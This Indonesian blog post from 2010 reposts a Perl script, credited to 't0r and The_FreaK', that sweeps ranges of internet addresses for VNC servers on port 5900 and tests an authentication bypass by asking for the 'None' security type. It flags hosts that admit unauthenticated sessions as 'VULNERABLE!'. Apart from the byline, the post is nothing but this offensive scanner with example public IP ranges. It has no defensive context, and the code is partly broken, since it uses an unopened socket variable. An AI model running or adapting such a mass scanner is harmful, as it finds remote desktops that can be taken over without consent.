Jumat, 12 Februari 2010

OpenVNC 4.11 Vulnerabillity Scanner

Code :
#!/bin/perl
use LWP::UserAgent;
use threads;
use threads::shared;
require IO::Socket;
if(@ARGV < 2) { nxie(); exit();}
$ip1=$ARGV[0];
$ip2=$ARGV[1];
$d = $ARGV[2] || 45;
$timeout = $ARGV[3] || 1; # here timeout must be changed if you got a better internet connection :P
use constant VNC_PORT => 5900;
my $j=0;
my $host = ".....";
my $sock;
my $proto_ver;
my $ignored;
my $auth_type;
my $sec_types;
my $vnc_data;

print "[~] Scaning $h\n";
while($ip1 =~ m/(\d+)/igs)
{
push (@a1 , $1);
}
while($ip2 =~ m/(\d+)/igs)
{
push (@a2 , $1);
}
while (!($a1[0]==$a2[0] and $a1[1]==$a2[1] and $a1[2]==$a2[2] and $a1[3]==$a2[3]))
{
if($j>$d)
{
$j=0
};
$thr[$j]=threads->create(\&scan);

if($thr[$j]->tid()>$d)
{
threads->object( $thr[$j]->tid()-$d )->join;
}
$j++;
if($a1[3]==255)
{
$a1[3]=0;
$a1[2]++;
}
else
{
$a1[3]++;
}
if($a1[2]==255)
{
$a1[2]=0;
$a1[1]++;
}
if($a1[1]==255)
{
$a1[1]=0;
$a1[0]++;
}

}
foreach(threads->list) { $_->join }

print "[+] Scaning complete $h\n";

sub scan()
{
print "[+] Trying: $a1[0].$a1[1].$a1[2].$a1[3]";

$sock1 = IO::Socket::INET->new(PeerAddr => "$a1[0].$a1[1].$a1[2].$a1[3] ", PeerPort => VNC_PORT, Proto => 'tcp',Timeout => 1);
if ($sock1)
{
$host = "$a1[0].$a1[1].$a1[2].$a1[3]";
print " ----- ka porten 5900 hapur....\n";

$sock->read($proto_ver, 12);
print $sock $proto_ver;
$sock->read($sec_types, 1);
$sock->read($ignored, unpack('C', $sec_types));
print $sock "\x01";
$sock->read($auth_type, 4);
if (unpack('I', $auth_type)) {
print " : not vulnerable refused to support
authentication type.\n";

close($sock);
return;
}
print $sock "\x01";
$sock->read($vnc_data, 4);
if (unpack('I', $vnc_data)) {
print "VULNERABLE! $proto_ver\n";

} else {
print " : not vulnerable did not send data.\n";

}
close($sock);
}

else {
print " : not vulnerable\n";
}
}
sub nxie()
{
print "\n==[ t0r and The_FreaK ]==\n\n";
print "<=====================================================>\n";
print " OpenVNC 4.11 authentication bypass scanner \n By The_FreaK and t0r\r\n";
print " Usage: vnc_scan.pl [threads] [timeout] \r\n";
print " Ex: vnc_scan.pl 80.91.112.1 80.200.245.255 40 2 \r\n";
print " vnc_scan.pl 80.91.112.1 80.200.245.255 \r\n";
print "<=====================================================>\n";
}

=============================================================================================
Diposting oleh Reynald di 09.58

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)